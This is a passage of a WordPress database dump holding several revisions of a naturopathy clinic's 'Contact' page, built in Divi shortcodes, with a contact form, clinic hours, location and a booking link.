header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" button_bg_enable_color=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-05-26 20:27:17','2021-05-26 12:27:17','',26,'https://verde.desidrivers.com.au/?p=196',0,'revision','',0),(198,1,'2021-05-26 20:33:18','2021-05-26 12:33:18','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||0px||false|false\" hover_enabled=\"0\" locked=\"off\" background_enable_image=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" background_enable_color=\"off\" sticky_enabled=\"0\" custom_margin=\"||60px|||\" min_height=\"224px\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\" min_height=\"560px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\" min_height=\"665px\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" hover_enabled=\"0\" sticky_enabled=\"0\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\" background_enable_image=\"off\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#CCD4C8\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" sticky_enabled=\"0\" form_field_font=\"Montserrat||||||||\" button_bg_enable_color=\"on\" button_border_color=\"#000000\" form_field_background_color__hover_enabled=\"on|desktop\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" success_message=\"Thanks for contacting us. We will be in touch soon.\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.4.7\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.4.7\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed/Thurs: 9am-5pm</span>\n<span style=\"font-family: Montserrat; color: #666666;\">Alternate Saturdays: 9am-1pm</span></h3>\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span>\n\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span>\n\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span>\n\n<span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span><span style=\"font-family: Montserrat; font-size: large;\"></span>\n\n<span style=\"font-family: Montserrat; font-size: large;\"></span>\n\n [/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" button_bg_enable_color=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-05-26 20:33:18','2021-05-26 12:33:18','',26,'https://verde.desidrivers.com.au/?p=198',0,'revision','',0),(213,1,'2021-05-27 13:10:09','2021-05-27 05:10:09','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"224px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"560px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\'; \">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed/Thurs: 9am-5pm</span>\n<span style=\"font-family: Montserrat; color: #666666;\">Alternate Saturdays: 9am-1pm</span></h3>\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span>\n\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span>\n\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span>\n\n<span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span><span style=\"font-family: Montserrat; font-size: large;\"></span>\n\n<span style=\"font-family: Montserrat; font-size: large;\"></span>\n\n [/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" button_url=\"https://verde-health.au2.cliniko.com/bookings\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-05-27 13:10:09','2021-05-27 05:10:09','',26,'https://verdenaturopathy.com.au/?p=213',0,'revision','',0),(200,1,'2021-05-26 20:38:09','2021-05-26 12:38:09','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||0px||false|false\" hover_enabled=\"0\" locked=\"off\" background_enable_image=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" background_enable_color=\"off\" sticky_enabled=\"0\" custom_margin=\"||60px|||\" min_height=\"224px\" 